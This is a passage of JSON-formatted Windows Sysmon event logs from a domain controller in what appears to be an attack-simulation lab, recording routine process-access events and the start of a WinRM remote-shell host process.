C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:51.956","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2617,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:51.956\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:51.956","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2618,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:51.964\r\nProcessGuid: {E2A3D6B1-108F-5F25-0000-0010BFB50400}\r\nProcessId: 4600\r\nImage: C:\\Windows\\System32\\winrshost.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Host Process for WinRM's Remote Shell plugin\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: winrshost.exe\r\nCommandLine: C:\\Windows\\system32\\WinrsHost.exe -Embedding\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-108F-5F25-0000-002089B50400}\r\nLogonId: 0x4B589\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96\r\nParentProcessGuid: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nParentProcessId: 596\r\nParentImage: C:\\Windows\\System32\\svchost.exe\r\nParentCommandLine: C:\\Windows\\system32\\svchost.exe -k DcomLaunch","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:51.964","ProcessGuid":"{E2A3D6B1-108F-5F25-0000-0010BFB50400}","Image":"C:\\Windows\\System32\\winrshost.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Host Process for WinRM's Remote Shell plugin","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"winrshost.exe","CommandLine":"C:\\Windows\\system32\\WinrsHost.exe -Embedding","CurrentDirectory":"C:\\Windows\\system32\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-108F-5F25-0000-002089B50400}","LogonId":"0x4b589","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96","ParentProcessGuid":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","ParentProcessId":"596","ParentImage":"C:\\Windows\\System32\\svchost.exe","ParentCommandLine":"C:\\Windows\\system32\\svchost.exe -k DcomLaunch","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2619,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:51.956\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-108F-5F25-0000-0010BFB50400}\r\nTargetProcessId: 4600\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:51.956","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-108F-5F25-0000-0010BFB50400}","TargetProcessId":"4600","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6f453|C:\\Windows\\System32\\KERNEL32.DLL+1d37f|c:\\windows\\system32\\rpcss.dll+35069|c:\\windows\\system32\\rpcss.dll+3a852|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2620,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:51.956\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-108F-5F25-0000-0010BFB50400}\r\nTargetProcessId: 4600\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:51.956","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-108F-5F25-0000-0010BFB50400}","TargetProcessId":"4600","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2621,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:51.956\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:51.956","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2622,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:51.956\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:51.956","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2623,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:51.956\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:51.956","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2624,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:51.956\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 